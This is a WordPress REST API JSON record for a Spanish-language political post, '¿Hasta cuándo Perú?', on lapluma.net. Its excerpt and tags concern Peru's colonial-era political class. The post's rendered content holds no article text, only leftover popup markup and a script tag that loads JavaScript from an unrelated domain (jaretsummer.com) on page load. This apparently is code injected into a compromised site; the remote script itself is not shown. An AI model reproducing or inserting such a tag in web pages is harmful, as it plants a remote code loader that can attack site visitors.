{"id":22119,"date":"2020-11-14T17:01:03","date_gmt":"2020-11-14T17:01:03","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=22119"},"modified":"2020-11-15T01:00:33","modified_gmt":"2020-11-15T01:00:33","slug":"hasta-cuando-peru","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/11\/14\/hasta-cuando-peru\/","title":{"rendered":"\u00bfHasta cu\u00e1ndo Per\u00fa?"},"content":{"rendered":"<p>&nbsp;<\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/p>\n<\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ese es el origen de la clase pol\u00edtica peruana que en su primer momento estuvo conformada por una \u00ednfima poblaci\u00f3n de \u201cvirreyes, cortesanos, aventureros, cl\u00e9rigos, doctores y soldados\u201d.<\/p>\n","protected":false},"author":9,"featured_media":22122,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[217],"tags":[2041,11231,11223,11222,11220,11226,11225,11224,11232,2479,11219,8832,11228,11218,11227,432],"coauthors":[266],"class_list":["post-22119","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-abya-yala","tag-buen-vivir","tag-casa-de-pizarro","tag-comunas-agricolas-y-sedentarias","tag-destruccion-maquina-de-produccion-incaica","tag-disolucion-de-la-unidad-sociedad-indigena","tag-economia-feudal","tag-economia-socialista-originaria","tag-explotacion-colonial","tag-fujimori-toledo-garcia-humala-kuczynski-vizcarra","tag-grupo-de-lima","tag-jose-carlos-mariategui","tag-mario-vargas-llosa","tag-minas-oro-plata-y-los-subsuelos","tag-peru-abya-yala","tag-rancia-oligarquia-limena","tag-simon-bolivar"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":true},"fr":{"title":false,"content":true,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/22119","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=22119"}],"version-history":[{"count":12,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/22119\/revisions"}],"predecessor-version":[{"id":22160,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/22119\/revisions\/22160"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/22122"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=22119"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=22119"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=22119"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=22119"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}